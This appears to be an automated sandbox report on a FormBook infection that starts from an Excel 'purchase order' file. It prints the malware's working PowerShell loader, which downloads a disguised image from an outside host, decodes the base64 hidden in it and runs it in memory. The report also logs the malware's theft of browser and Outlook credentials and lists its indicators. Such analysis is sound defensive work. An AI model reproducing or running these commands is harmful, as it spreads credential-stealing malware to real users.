? ?cwb0? ? ? ? ?gu? ? ? ? ?bq? ? ? ? ?u? ? ? ? ?e4? ? ? ? ?zqb0? ? ? ? ?c4? ? ? ? ?vwbl? ? ? ? ?gi? ? ? ? ?qwbs? ? ? ? ?gk? ? ? ? ?zqbu? ? ? ? ?hq? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?gk? ? ? ? ?bqbh? ? ? ? ?gc? ? ? ? ?zqbc? ? ? ? ?hk? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?hm? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?j? ? ? ? ?b3? ? ? ? ?gu? ? ? ? ?ygbd? ? ? ? ?gw? ? ? ? ?aqbl? ? ? ? ?g4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?eq? ? ? ? ?bwb3? ? ? ? ?g4? ? ? ? ?b? ? ? ? ?bv? ? ? ? ?ge? ? ? ? ?z? ? ? ? ?be? ? ? ? ?ge? ? ? ? ?d? ? ? ? ?bh? ? ? ? ?cg? ? ? ? ?j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?vqby? ? ? ? ?gw? ? ? ? ?kq? ? ? ? ?7? ? ? ? ?cq? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?fq? ? ? ? ?zqb4? ? ? ? ?hq? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?wwbt? ? ? ? ?hk? ? ? ? ?cwb0? ? ? ? ?gu? ? ? ? ?bq? ? ? ? ?u? ? ? ? ?fq? ? ? ? ?zqb4? ? ? ? ?hq? ? ? ? ?lgbf? ? ? ? ?g4? ? ? ? ?ywbv? ? ? ? ?gq? ? ? ? ?aqbu? ? ? ? ?gc? ? ? ? ?xq? ? ? ? ?6? ? ? ? ?do? ? ? ? ?vqbu? ? ? ? ?ey? ? ? ? ?o? ? ? ? ?? ? ? ? ?u? ? ? ? ?ec? ? ? ? ?zqb0? ? ? ? ?fm? ? ? ? ?d? ? ? ? ?by? ? ? ? ?gk? ? ? ? ?bgbn? ? ? ? ?cg? ? ? ? ?j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?qgb5? ? ? ? ?hq? ? ? ? ?zqbz? ? ? ? ?ck? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?hm? ? ? ? ?d? ? ? ? ?bh? ? ? ? ?hi? ? ? ? ?d? ? ? ? ?bg? ? ? ? ?gw? ? ? ? ?yqbn? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?cc? ? ? ? ?p? ? ? ? ?? ? ? ? ?8? ? ? ? ?ei? ? ? ? ?qqbt? ? ? ? ?eu? ? ? ? ?ng? ? ? ? ?0? ? ? ? ?f8? ? ? ? ?uwbu? ? ? ? ?ee? ? ? ? ?ugbu? ? ? ? ?d4? ? ? ? ?pg? ? ? ? ?n? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?bl? ? ? ? ?g4? ? ? ? ?z? ? ? ? ?bg? ? ? ? ?gw? ? ? ? ?yqbn? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?cc? ? ? ? ?p? ? ? ? ?? ? ? ? ?8? ? ? ? ?e
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "$imageurl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webclient = new-object system.net.webclient;$imagebytes = $webclient.downloaddata($imageurl);$imagetext = [system.text.encoding]::utf8.getstring($imagebytes);$startflag = '<<base64_start>>';$endflag = '<<base64_end>>';$startindex = $imagetext.indexof($startflag);$endindex = $imagetext.indexof($endflag);$startindex -ge 0 -and $endindex -gt $startindex;$startindex += $startflag.length;$base64length = $endindex - $startindex;$base64command = $imagetext.substring($startindex, $base64length);$commandbytes = [system.convert]::frombase64string($base64command);$loadedassembly = [system.reflection.assembly]::load($commandbytes);$type = $loadedassembly.gettype('dnlib.io.home');$method = $type.getmethod('vai').invoke($null, [object[]] ('txt.grw/341/33.051.012.291//:ptth' , 'desativado' , 'desativado' , 'desativado','regasm',''))"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?vqby? ? ? ? ?gw? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?jwbo? ? ? ? ?hq? ? ? ? ?d? ? ? ? ?bw? ? ? ? ?hm? ? ? ? ?og? ? ? ? ?v? ? ? ? ?c8? ? ? ? ?aqbh? ? ? ? ?dg? ? ? ? ?m? ? ? ? ?? ? ? ? ?z? ? ? ? ?de? ? ? ? ?m? ? ? ? ?? ? ? ? ?0? ? ? ? ?c4? ? ? ? ?dqbz? ? ? ? ?c4? ? ? ? ?yqby? ? ? ? ?gm? ? ? ? ?a? ? ? ? ?bp? ? ? ? ?hy? ? ? ? ?zq? ? ? ? ?u? ? ? ? ?g8? ? ? ? ?cgbn? ? ? ? ?c8? ? ? ? ?mg? ? ? ? ?3? ? ? ? ?c8? ? ? ? ?aqb0? ? ? ? ?gu? ? ? ? ?bqbz? ? ? ? ?c8? ? ? ? ?dgbi? ? ? ? ?hm? ? ? ? ?xw? ? ? ? ?y? ? ? ? ?d? ? ? ? ?? ? ? ? ?mg? ? ? ? ?0? ? ? ? ?d? ? ? ? ?? ? ? ? ?nw? ? ? ? ?y? ? ? ? ?dy? ? ? ? ?xw? ? ? ? ?y? ? ? ? ?d? ? ? ? ?? ? ? ? ?mg? ? ? ? ?0? ? ? ? ?d? ? ? ? ?? ? ? ? ?nw? ? ? ? ?y? ? ? ? ?dy? ? ? ? ?lwb2? ? ? ? ?gi? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?go? ? ? ? ?c? ? ? ? ?bn? ? ? ? ?cc? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?hc? ? ? ? ?zqbi? ? ? ? ?em? ? ? ? ?b? ? ? ? ?bp? ? ? ? ?gu? ? ? ? ?bgb0? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?e4? ? ? ? ?zqb3? ? ? ? ?c0? ? ? ? ?twbi? ? ? ? ?go? ? ? ? ?zqbj? ? ? ? ?hq? ? ? ? ?i? ? ? ? ?bt? ? ? ? ?hk? ? ? ? ?cwb0? ? ? ? ?gu? ? ? ? ?bq? ? ? ? ?u? ? ? ? ?e4? ? ? ? ?zqb0? ? ? ? ?c4? ? ? ? ?vwbl? ? ? ? ?gi? ? ? ? ?qwbs? ? ? ? ?gk? ? ? ? ?zqbu? ? ? ? ?hq? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?gk? ? ? ? ?bqbh? ? ? ? ?gc? ? ? ? ?zqbc? ? ? ? ?hk? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?hm? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?j? ? ? ? ?b3? ? ? ? ?gu? ? ? ? ?ygbd? ? ? ? ?gw? ? ? ? ?aqbl? ? ? ? ?g4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?eq? ? ? ? ?bwb3? ? ? ? ?g4? ? ? ? ?b? ? ? ? ?bv? ? ? ? ?ge? ? ? ? ?z? ? ? ? ?be? ? ? ? ?ge? ? ? ? ?d? ? ? ? ?bh? ? ? ? ?cg? ? ? ? ?j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?vqby? ? ? ? ?gw? ? ? ? ?kq? ? ? ? ?7? ? ? ? ?cq? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?fq? ? ? ? ?zqb4? ? ? ? ?hq? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?wwbt? ? ? ? ?hk? ? ? ? ?cwb0? ? ? ? ?gu? ? ? ? ?bq? ? ? ? ?u? ? ? ? ?fq? ? ? ? ?zqb4? ? ? ? ?hq? ? ? ? ?lgbf? ? ? ? ?g4? ? ? ? ?ywbv? ? ? ? ?gq? ? ? ? ?aqbu? ? ? ? ?gc? ? ? ? ?xq? ? ? ? ?6? ? ? ? ?do? ? ? ? ?vqbu? ? ? ? ?ey? ? ? ? ?o? ? ? ? ?? ? ? ? ?u? ? ? ? ?ec? ? ? ? ?zqb0? ? ? ? ?fm? ? ? ? ?d? ? ? ? ?by? ? ? ? ?gk? ? ? ? ?bgbn? ? ? ? ?cg? ? ? ? ?j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?qgb5? ? ? ? ?hq? ? ? ? ?zqbz? ? ? ? ?ck? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?hm? ? ? ? ?d? ? ? ? ?bh? ? ? ? ?hi? ? ? ? ?d? ? ? ? ?bg? ? ? ? ?gw? ? ? ? ?yqbn? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?cc? ? ? ? ?p? ? ? ? ?? ? ? ? ?8? ? ? ? ?ei? ? ? ? ?qqbt? ? ? ? ?eu? ? ? ? ?ng? ? ? ? ?0? ? ? ? ?f8? ? ? ? ?uwbu? ? ? ? ?ee? ? ? ? ?ugbu? ? ? ? ?d4? ? ? ? ?pg? ? ? ? ?n? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?bl? ? ? ? ?g4? ? ? ? ?z? ? ? ? ?bg? ? ? ? ?gw? ? ? ? ?yqbn? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?cc? ? ? ? ?p? ? ? ? ?? ? ? ? ?8? ? ? ? ?eJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "$imageurl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webclient = new-object system.net.webclient;$imagebytes = $webclient.downloaddata($imageurl);$imagetext = [system.text.encoding]::utf8.getstring($imagebytes);$startflag = '<<base64_start>>';$endflag = '<<base64_end>>';$startindex = $imagetext.indexof($startflag);$endindex = $imagetext.indexof($endflag);$startindex -ge 0 -and $endindex -gt $startindex;$startindex += $startflag.length;$base64length = $endindex - $startindex;$base64command = $imagetext.substring($startindex, $base64length);$commandbytes = [system.convert]::frombase64string($base64command);$loadedassembly = [system.reflection.assembly]::load($commandbytes);$type = $loadedassembly.gettype('dnlib.io.home');$method = $type.getmethod('vai').invoke($null, [object[]] ('txt.grw/341/33.051.012.291//:ptth' , 'desativado' , 'desativado' , 'desativado','regasm',''))"Jump to behavior
            Source: wfbjvizcWo.exe, 0000000C.00000002.620937131.00000000008C0000.00000002.00000001.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000C.00000000.450633569.00000000008C0000.00000002.00000001.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000000.479960904.0000000000850000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: wfbjvizcWo.exe, 0000000C.00000002.620937131.00000000008C0000.00000002.00000001.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000C.00000000.450633569.00000000008C0000.00000002.00000001.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000000.479960904.0000000000850000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: wfbjvizcWo.exe, 0000000C.00000002.620937131.00000000008C0000.00000002.00000001.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000C.00000000.450633569.00000000008C0000.00000002.00000001.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000000.479960904.0000000000850000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: !Progman
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\find.exeQueries volume information: C:\Users\user\AppData\Local\Temp\gxjh-p60.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\find.exeQueries volume information: C:\Users\user\AppData\Local\Temp\gxjh-p60.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\find.exeQueries volume information: C:\Users\user\AppData\Local\Temp\gxjh-p60.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\find.exeQueries volume information: C:\Users\user\AppData\Local\Temp\gxjh-p60.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\find.exeQueries volume information: C:\Users\user\AppData\Local\Temp\gxjh-p60.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\find.exeQueries volume information: C:\Users\user\AppData\Local\Temp\gxjh-p60.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\find.exeQueries volume information: C:\Users\user\AppData\Local\Temp\gxjh-p60.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\find.exeQueries volume information: C:\Users\user\AppData\Local\Temp\gxjh-p60.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\find.exeCode function: 13_2_61E89A10 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,13_2_61E89A10
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000B.00000002.466471419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.521653656.0000000000100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.620757047.00000000000F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.620790814.00000000002C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.620825188.0000000000330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.466373539.00000000003A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.469509226.00000000025A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\find.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\find.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\find.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\find.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\find.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: C:\Windows\SysWOW64\find.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503Jump to behavior
            Source: C:\Windows\SysWOW64\find.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046Jump to behavior
            Source: C:\Windows\SysWOW64\find.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45aJump to behavior
            Source: C:\Windows\SysWOW64\find.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789Jump to behavior
            Source: C:\Windows\SysWOW64\find.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1Jump to behavior
            Source: C:\Windows\SysWOW64\find.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743Jump to behavior
            Source: C:\Windows\SysWOW64\find.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11Jump to behavior
            Source: C:\Windows\SysWOW64\find.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35Jump to behavior
            Source: C:\Windows\SysWOW64\find.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4addJump to behavior
            Source: C:\Windows\SysWOW64\find.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046Jump to behavior
            Source: C:\Windows\SysWOW64\find.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2Jump to behavior
            Source: C:\Windows\SysWOW64\find.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: C:\Windows\SysWOW64\find.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
            Source: C:\Windows\SysWOW64\find.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
            Source: C:\Windows\SysWOW64\find.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
            Source: C:\Windows\SysWOW64\find.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35Jump to behavior
            Source: C:\Windows\SysWOW64\find.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761Jump to behavior
            Source: C:\Windows\SysWOW64\find.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7Jump to behavior
            Source: C:\Windows\SysWOW64\find.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000B.00000002.466471419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.521653656.0000000000100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.620757047.00000000000F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.620790814.00000000002C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.620825188.0000000000330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.466373539.00000000003A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.469509226.00000000025A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\find.exeCode function: 13_2_61E291A3 sqlite3_bind_zeroblob64,sqlite3_mutex_enter,sqlite3_bind_zeroblob,sqlite3_mutex_leave,13_2_61E291A3
            Source: C:\Windows\SysWOW64\find.exeCode function: 13_2_61E290BC sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_blob,13_2_61E290BC
            Source: C:\Windows\SysWOW64\find.exeCode function: 13_2_61E2904F sqlite3_bind_zeroblob,sqlite3_mutex_leave,13_2_61E2904F
            Source: C:\Windows\SysWOW64\find.exeCode function: 13_2_61E035CD sqlite3_bind_parameter_count,13_2_61E035CD
            Source: C:\Windows\SysWOW64\find.exeCode function: 13_2_61E035DF sqlite3_bind_parameter_name,13_2_61E035DF
            Source: C:\Windows\SysWOW64\find.exeCode function: 13_2_61E135A4 sqlite3_bind_parameter_index,13_2_61E135A4
            Source: C:\Windows\SysWOW64\find.exeCode function: 13_2_61E16B17 sqlite3_clear_bindings,sqlite3_mutex_enter,sqlite3_mutex_leave,13_2_61E16B17
            Source: C:\Windows\SysWOW64\find.exeCode function: 13_2_61E28DC5 sqlite3_bind_blob64,13_2_61E28DC5
            Source: C:\Windows\SysWOW64\find.exeCode function: 13_2_61E28D9E sqlite3_mutex_leave,sqlite3_bind_blob,13_2_61E28D9E
            Source: C:\Windows\SysWOW64\find.exeCode function: 13_2_61E16CE7 sqlite3_mutex_enter,sqlite3_mutex_leave,sqlite3_transfer_bindings,13_2_61E16CE7
            Source: C:\Windows\SysWOW64\find.exeCode function: 13_2_61E28FD2 sqlite3_bind_pointer,sqlite3_mutex_leave,13_2_61E28FD2
            Source: C:\Windows\SysWOW64\find.exeCode function: 13_2_61E28FA1 sqlite3_bind_null,sqlite3_mutex_leave,13_2_61E28FA1
            Source: C:\Windows\SysWOW64\find.exeCode function: 13_2_61E28F7B sqlite3_bind_int,sqlite3_bind_int64,13_2_61E28F7B
            Source: C:\Windows\SysWOW64\find.exeCode function: 13_2_61E28F2C sqlite3_bind_int64,sqlite3_mutex_leave,13_2_61E28F2C
            Source: C:\Windows\SysWOW64\find.exeCode function: 13_2_61E28EC7 sqlite3_bind_double,sqlite3_mutex_leave,13_2_61E28EC7
            Source: C:\Windows\SysWOW64\find.exeCode function: 13_2_61E28EA0 sqlite3_bind_text16,13_2_61E28EA0
            Source: C:\Windows\SysWOW64\find.exeCode function: 13_2_61E28E33 sqlite3_bind_text64,13_2_61E28E33
            Source: C:\Windows\SysWOW64\find.exeCode function: 13_2_61E28E0C sqlite3_bind_text,13_2_61E28E0C

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information121
            Scripting            		Valid Accounts43
            Exploitation for Client Execution            		121
            Scripting            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		1
            OS Credential Dumping            		1
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts111
            Command and Scripting Interpreter            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		LSASS Memory1
            File and Directory Discovery            		Remote Desktop Protocol1
            Browser Session Hijacking            		11
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts3
            PowerShell            		1
            Browser Extensions            		412
            Process Injection            		21
            Obfuscated Files or Information            		Security Account Manager16
            System Information Discovery            		SMB/Windows Admin Shares1
            Data from Local System            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            DLL Side-Loading            		NTDS2
            Security Software Discovery            		Distributed Component Object Model1
            Email Collection            		5
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Masquerading            		LSA Secrets2
            Process Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
            Virtualization/Sandbox Evasion            		Cached Domain Credentials31
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items412
            Process Injection            		DCSync1
            Application Window Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
            Remote System Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1493701 Sample: Mac Purchase Order PO102935.xls Startdate: 16/08/2024 Architecture: WINDOWS Score: 100 67 jiourl.com 2->67 101 Multi AV Scanner detection for domain / URL 2->101 103 Suricata IDS alerts for network traffic 2->103 105 Malicious sample detected (through community Yara rule) 2->105 107 20 other signatures 2->107 13 EXCEL.EXE 57 34 2->13         started        signatures3 process4 dnsIp5 73 jiourl.com 188.114.97.3, 443, 49161, 49163 CLOUDFLARENETUS European Union 13->73 75 192.210.150.33, 49162, 49169, 49170 AS-COLOCROSSINGUS United States 13->75 63 C:\...\Mac Purchase Order PO102935.xls (copy), Composite 13->63 dropped 65 seethesmoothofbutt...etandhotburn[1].doc, Rich 13->65 dropped 17 wscript.exe 1 13->17         started        20 WINWORD.EXE 339 33 13->20         started        file6 process7 dnsIp8 85 Suspicious powershell command line found 17->85 87 Wscript starts Powershell (via cmd or directly) 17->87 89 Very long command line found 17->89 97 3 other signatures 17->97 24 powershell.exe 4 17->24         started        69 jiourl.com 20->69 51 C:\Users\user\AppData\...\jiourl.com.url, MS 20->51 dropped 53 C:\Users\user\AppData\Roaming\...behaviorgraphmwgTs.url, 